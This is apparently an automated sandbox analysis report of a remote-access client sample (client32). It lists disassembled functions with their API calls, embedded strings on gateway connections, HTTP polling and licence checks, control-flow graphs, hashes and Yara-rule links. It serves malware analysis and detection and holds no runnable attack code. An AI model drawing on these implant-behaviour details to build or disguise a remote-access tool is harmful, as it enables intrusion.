                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$ErrorLast$Internet$FreeLibrary_free$CloseConnectHandleHeapLoadOpen
                                                                                                                                                                                • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                                                                                                • API String ID: 1118357157-913974648
                                                                                                                                                                                • Opcode ID: f132b7b777b03faa75519775ec0f910eba12e3aea237f308be71bdb20c5ef37f
                                                                                                                                                                                • Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
                                                                                                                                                                                • Opcode Fuzzy Hash: f132b7b777b03faa75519775ec0f910eba12e3aea237f308be71bdb20c5ef37f
                                                                                                                                                                                • Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60
                                                                                                                                                                                Function 1111C990 Relevance: 79.4, APIs: 23, Strings: 22, Instructions: 634COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 1111C9E2
                                                                                                                                                                                • SystemParametersInfoA.USER32(00000025,00000000,00000000,00000000), ref: 1111C9F8
                                                                                                                                                                                • SystemParametersInfoA.USER32(00000026,00000000,?,00000000), ref: 1111CA0A
                                                                                                                                                                                • SystemParametersInfoA.USER32(00000049,00000008,00000008,00000000), ref: 1111CA60
                                                                                                                                                                                • SystemParametersInfoA.USER32(00000048,00000008,00000008,00000000), ref: 1111CA75
                                                                                                                                                                                • SystemParametersInfoA.USER32(00001002,00000000,?,00000000), ref: 1111CAD9
                                                                                                                                                                                • SystemParametersInfoA.USER32(00001005,00000000,00000000,00000000), ref: 1111CB1F
                                                                                                                                                                                • SystemParametersInfoA.USER32(00001004,00000000,?,00000000), ref: 1111CB37
                                                                                                                                                                                • SystemParametersInfoA.USER32(00001007,00000000,00000000,00000000), ref: 1111CB7D
                                                                                                                                                                                • SystemParametersInfoA.USER32(00001006,00000000,?,00000000), ref: 1111CB95
                                                                                                                                                                                • SystemParametersInfoA.USER32(0000101B,00000000,00000000,00000000), ref: 1111CBDB
                                                                                                                                                                                • SystemParametersInfoA.USER32(0000101A,00000000,?,00000000), ref: 1111CBF3
                                                                                                                                                                                • SystemParametersInfoA.USER32(00001015,00000000,00000000,00000000), ref: 1111CC39
                                                                                                                                                                                • SystemParametersInfoA.USER32(00001014,00000000,00000000,00000000), ref: 1111CC51
                                                                                                                                                                                • SystemParametersInfoA.USER32(00001017,00000000,00000000,00000000), ref: 1111CC97
                                                                                                                                                                                • SystemParametersInfoA.USER32(00001016,00000000,11001824,00000000), ref: 1111CCAF
                                                                                                                                                                                • SystemParametersInfoA.USER32(00001025,00000000,00000000,00000000), ref: 1111CCF5
                                                                                                                                                                                • SystemParametersInfoA.USER32(00001024,00000000,00000073,00000000), ref: 1111CD0D
                                                                                                                                                                                • SystemParametersInfoA.USER32(00001009,00000000,00000000,00000000), ref: 1111CDBF
                                                                                                                                                                                • SystemParametersInfoA.USER32(00001008,00000000,00000000,00000000), ref: 1111CDD7
                                                                                                                                                                                • SystemParametersInfoA.USER32(0000004B,00000000,00000000,00000000), ref: 1111CE1A
                                                                                                                                                                                • SystemParametersInfoA.USER32(0000004A,00000000,?,00000000), ref: 1111CE2F
                                                                                                                                                                                • SystemParametersInfoA.USER32(00001003,00000000,00000000,00000000), ref: 1111CAC1
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: System$InfoParameters$Metrics__wcstoi64
                                                                                                                                                                                • String ID: EnableAnimation$EnableCBAnimation$EnableDragFullWindows$EnableDropShadow$EnableFontSmoothing$EnableGradientCaptions$EnableIESmoothScroll$EnableLBSmoothScroll$EnableLVAlphaSelect$EnableLVShadow$EnableLVWatermark$EnableMenuAnimation$EnableSelectionFade$EnableShadowCursor$EnableTBAnimations$EnableTTAnimation$EnableTVSmoothScroll$ListviewAlphaSelect$ListviewShadow$ListviewWatermark$SmoothScroll$TaskbarAnimations
                                                                                                                                                                                • API String ID: 3799663137-3751266815
                                                                                                                                                                                • Opcode ID: 69ae3abdd7f9d62ee398f065eaa1f6e61b5f86921c0cf1df4ab38b9f59a99efd
                                                                                                                                                                                • Instruction ID: bf678e33c67380cbbf5bb6d1fd1adca19844daef576a9ba588db8e9803c6ea1e
                                                                                                                                                                                • Opcode Fuzzy Hash: 69ae3abdd7f9d62ee398f065eaa1f6e61b5f86921c0cf1df4ab38b9f59a99efd
                                                                                                                                                                                • Instruction Fuzzy Hash: 2612A631600B42AAF720CF76CE44FABFBB5EB84B44F40442CA5469E5C8DAB4F441C799
                                                                                                                                                                                Function 110627B0 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                                                                                                                  • Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                                                                                                                • _fgets.LIBCMT ref: 110628E2
                                                                                                                                                                                • _strpbrk.LIBCMT ref: 11062949
                                                                                                                                                                                • _fgets.LIBCMT ref: 11062A4C
                                                                                                                                                                                • _strpbrk.LIBCMT ref: 11062AC3
                                                                                                                                                                                • __wcstoui64.LIBCMT ref: 11062ADC
                                                                                                                                                                                • _fgets.LIBCMT ref: 11062B55
                                                                                                                                                                                • _strpbrk.LIBCMT ref: 11062B7B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                                                                                                                • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                                                                                                                • API String ID: 716802716-1571441106
                                                                                                                                                                                • Opcode ID: 5a7bcf15969c39ee10445a5a446c7edc6ecbf1e696e3138bca91172ef2ef5ec5
                                                                                                                                                                                • Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
                                                                                                                                                                                • Opcode Fuzzy Hash: 5a7bcf15969c39ee10445a5a446c7edc6ecbf1e696e3138bca91172ef2ef5ec5
                                                                                                                                                                                • Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91
                                                                                                                                                                                Function 6C60A980 Relevance: 56.4, APIs: 28, Strings: 4, Instructions: 389networkCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2081 6c60a980-6c60a9e7 call 6c605840 2084 6c60aa9c 2081->2084 2085 6c60a9ed-6c60a9f0 2081->2085 2087 6c60aaa2-6c60aaae 2084->2087 2085->2084 2086 6c60a9f6-6c60a9fb 2085->2086 2086->2084 2090 6c60aa01-6c60aa06 2086->2090 2088 6c60aab0-6c60aac5 call 6c6228e1 2087->2088 2089 6c60aac6-6c60aacd 2087->2089 2093 6c60ab48-6c60ab58 socket 2089->2093 2094 6c60aacf-6c60aad7 2089->2094 2090->2084 2092 6c60aa0c-6c60aa21 EnterCriticalSection 2090->2092 2098 6c60aa23-6c60aa2b 2092->2098 2099 6c60aa89-6c60aa9a LeaveCriticalSection 2092->2099 2095 6c60ab70-6c60abc9 #21 * 2 call 6c605e90 2093->2095 2096 6c60ab5a-6c60ab6f WSAGetLastError call 6c6228e1 2093->2096 2094->2093 2100 6c60aad9-6c60aadc 2094->2100 2110 6c60abe8-6c60ac1f bind 2095->2110 2111 6c60abcb-6c60abe3 #21 2095->2111 2103 6c60aa30-6c60aa39 2098->2103 2099->2087 2100->2093 2104 6c60aade-6c60ab05 call 6c60a5c0 2100->2104 2107 6c60aa49-6c60aa51 2103->2107 2108 6c60aa3b-6c60aa3f 2103->2108 2118 6c60ad4a-6c60ad69 EnterCriticalSection 2104->2118 2119 6c60ab0b-6c60ab2f WSAGetLastError call 6c6030a0 2104->2119 2107->2103 2114 6c60aa53-6c60aa5e LeaveCriticalSection 2107->2114 2108->2107 2112 6c60aa41-6c60aa47 2108->2112 2115 6c60ac41-6c60ac49 2110->2115 2116 6c60ac21-6c60ac40 WSAGetLastError closesocket call 6c6228e1 2110->2116 2111->2110 2112->2107 2117 6c60aa60-6c60aa88 LeaveCriticalSection call 6c6228e1 2112->2117 2114->2087 2125 6c60ac59-6c60ac64 2115->2125 2126 6c60ac4b-6c60ac57 2115->2126 2120 6c60ae50-6c60ae80 LeaveCriticalSection GetTickCount InterlockedExchange 2118->2120 2121 6c60ad6f-6c60ad7d 2118->2121 2132 6c60ae82-6c60ae92 call 6c6228e1 2119->2132 2136 6c60ab35-6c60ab47 call 6c6228e1 2119->2136 2120->2132 2127 6c60ad80-6c60ad86 2121->2127 2131 6c60ac65-6c60ac83 htons WSASetBlockingHook call 6c607610 2125->2131 2126->2131 2134 6c60ad97-6c60ae0f InitializeCriticalSection call 6c608fb0 call 6c620ef0 2127->2134 2135 6c60ad88-6c60ad90 2127->2135 2138 6c60ac88-6c60ac8d 2131->2138 2156 6c60ae11 2134->2156 2157 6c60ae18-6c60ae4b getsockname 2134->2157 2135->2127 2140 6c60ad92 2135->2140 2143 6c60acc6-6c60accd 2138->2143 2144 6c60ac8f-6c60acc5 WSAGetLastError WSAUnhookBlockingHook closesocket call 6c6030a0 call 6c6228e1 2138->2144 2140->2120 2148 6c60ad45 WSAUnhookBlockingHook 2143->2148 2149 6c60accf-6c60acd6 2143->2149 2148->2118 2149->2148 2152 6c60acd8-6c60acfb call 6c60a5c0 2149->2152 2152->2148 2160 6c60acfd-6c60ad2c WSAGetLastError WSAUnhookBlockingHook closesocket call 6c6030a0 2152->2160 2156->2157 2157->2120 2160->2132 2163 6c60ad32-6c60ad44 call 6c6228e1 2160->2163
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 6C605840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C608F91,00000000,00000000,6C64B8DA,?,00000080), ref: 6C605852
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(6C64B898,?,00000000,00000000), ref: 6C60AA11
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6C64B898), ref: 6C60AA58
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6C64B898), ref: 6C60AA68
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6C64B898), ref: 6C60AA94
                                                                                                                                                                                • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6C60AB0B
                                                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6C60AB4E
                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6C60AB5A
                                                                                                                                                                                • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C60AB8E
                                                                                                                                                                                • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C60ABB1
                                                                                                                                                                                • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C60ABE3
                                                                                                                                                                                • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C60AC18
                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C60AC21
                                                                                                                                                                                • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C60AC29
                                                                                                                                                                                • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C60AC65
                                                                                                                                                                                • WSASetBlockingHook.WSOCK32(6C6063A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C60AC76
                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C60AC8F
                                                                                                                                                                                • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C60AC96
                                                                                                                                                                                • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C60AC9C
                                                                                                                                                                                • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C60ACFD
                                                                                                                                                                                • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C60AD04
                                                                                                                                                                                • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C60AD0A
                                                                                                                                                                                • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C60AD45
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(6C64B898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C60AD4F
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(-6C64CB4A), ref: 6C60ADE6
                                                                                                                                                                                  • Part of subcall function 6C608FB0: _memset.LIBCMT ref: 6C608FE4
                                                                                                                                                                                  • Part of subcall function 6C608FB0: getsockname.WSOCK32(?,?,00000010,?,030B2998,?), ref: 6C609005
                                                                                                                                                                                • getsockname.WSOCK32(00000000,?,?), ref: 6C60AE4B
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6C64B898), ref: 6C60AE60
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 6C60AE6C
                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 6C60AE7A
                                                                                                                                                                                Strings
                                                                                                                                                                                • Connect error to %s using hijacked socket, error %d, xrefs: 6C60AB17
                                                                                                                                                                                • *TcpNoDelay, xrefs: 6C60ABB8
                                                                                                                                                                                • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6C60AD14
                                                                                                                                                                                • Cannot connect to gateway %s, error %d, xrefs: 6C60ACA6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                                                                                                                • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                                                                                                                • API String ID: 692187944-2561115898
                                                                                                                                                                                • Opcode ID: d86531291c450d331e39b6dce6a901221a8c97cbd2976b5549d7fb4abb7cc2fd
                                                                                                                                                                                • Instruction ID: cc67fea5e95445cb4608bc982a103ad373ed54a861cf969eb27189e9c534db51
                                                                                                                                                                                • Opcode Fuzzy Hash: d86531291c450d331e39b6dce6a901221a8c97cbd2976b5549d7fb4abb7cc2fd
                                                                                                                                                                                • Instruction Fuzzy Hash: B1E1B171B042189FDB14DF54C980BEDB3B5EF49304F1081AAE90AA7781DB359D88CF99
                                                                                                                                                                                Function 6C6091F0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 97sleepnetworkCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • #16.WSOCK32(00000000,?,a3al,00000000,00000000,?,00000007), ref: 6C60924C
                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000,?,a3al,00000000,00000000,?,00000007), ref: 6C60925B
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 6C609274
                                                                                                                                                                                • Sleep.KERNEL32(00000001,00000000,?,a3al,00000000,00000000,?,00000007), ref: 6C6092A8
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 6C6092B0
                                                                                                                                                                                • Sleep.KERNEL32(00000014), ref: 6C6092BC
                                                                                                                                                                                Strings
                                                                                                                                                                                • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6C60922B
                                                                                                                                                                                • ReadSocket - Would block, xrefs: 6C60928A
                                                                                                                                                                                • ReadSocket - Error %d reading response, xrefs: 6C6092F7
                                                                                                                                                                                • ReadSocket - Connection has been closed by peer, xrefs: 6C6092E0
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C609226
                                                                                                                                                                                • *RecvTimeout, xrefs: 6C60927B
                                                                                                                                                                                • a3al, xrefs: 6C609244
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountSleepTick$ErrorLast
                                                                                                                                                                                • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$a3al$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                                                                                                                • API String ID: 2495545493-1537456300
                                                                                                                                                                                • Opcode ID: 4d7f10ff84355495ddf228ac1f437eba532393647d49fe646b448b369cf88e5d
                                                                                                                                                                                • Instruction ID: c43817c9adcbaabbce6c0f2666f2ea86fcccaf0fd338407cf2fe5c522ebc514f
                                                                                                                                                                                • Opcode Fuzzy Hash: 4d7f10ff84355495ddf228ac1f437eba532393647d49fe646b448b369cf88e5d
                                                                                                                                                                                • Instruction Fuzzy Hash: 21312671F04208ABDB04EFB8DA84B8E73F5EB45329F00C965E908E7A40E731D9148B9C
                                                                                                                                                                                Function 6C613130 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemTime.KERNEL32(?,?,?,939B354D,32ADAD4B,939B34B3,FFFFFFFF,00000000), ref: 6C6131E2
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6C63ECB0), ref: 6C6131EC
                                                                                                                                                                                • GetSystemTime.KERNEL32(?,32ADAD4B,939B34B3,FFFFFFFF,00000000), ref: 6C61322A
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6C63ECB0), ref: 6C613234
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(6C64B898,?,939B354D), ref: 6C6132BE
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6C64B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6C6132D3
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C61334D
                                                                                                                                                                                  • Part of subcall function 6C61BA20: __strdup.LIBCMT ref: 6C61BA3A
                                                                                                                                                                                  • Part of subcall function 6C61BB00: _free.LIBCMT ref: 6C61BB2D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                                                                                                                • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                                                                                                                • API String ID: 1510130979-3441452530
                                                                                                                                                                                • Opcode ID: 521d5cce4f8c5fde1ecac2506847182237cd43622a4f40e6c09d0af5e0be8c57
                                                                                                                                                                                • Instruction ID: 6f699b02ddbc1519afef8e5c0d5efee4259e8fd6ddc2989a83ce41faf8902512
                                                                                                                                                                                • Opcode Fuzzy Hash: 521d5cce4f8c5fde1ecac2506847182237cd43622a4f40e6c09d0af5e0be8c57
                                                                                                                                                                                • Instruction Fuzzy Hash: 7D617372918208AFCB14EFA9D884EEEB7B5FF49315F10C519E416A3B40DB34A508CB6D
                                                                                                                                                                                Function 11145C70 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                                                                                  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,11110200,75BF8400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                                                                                • _strncpy.LIBCMT ref: 11145DCA
                                                                                                                                                                                  • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 11145E66
